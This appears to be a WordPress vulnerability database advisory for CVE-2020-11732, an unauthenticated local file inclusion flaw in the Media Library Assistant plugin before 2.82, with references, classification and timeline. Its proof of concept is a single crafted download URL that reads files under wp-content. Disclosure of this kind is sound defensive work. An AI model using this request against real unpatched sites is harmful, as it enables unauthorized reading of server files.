Media Library Assistant < 2.82 - Unauthenticated Limited Local File Inclusion



Description
The Media Library Assistant plugin before 2.82 for WordPress suffers from a Local File Inclusion vulnerability in mla_gallery link=download.
Proof of Concept
The LFI is restricted to the "wp-content" directory.

http://www.example.com/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/htl&mla_download_file=/app/public/wp-content/plugins/index.php

Affects Plugin

fixed in version 2.82

References

CVE 2020-11732
ExploitDB 48315
PacketStorm 157200
URL https://plugins.trac.wordpress.org/changeset/2273526/media-library-assistant

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Views 949
Verified Yes
WPVDB ID 10177

Timeline

Publicly Published 2020-04-13 (about 1 month ago)
Added 2020-04-13 (about 1 month ago)
Last Updated 2020-04-15 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin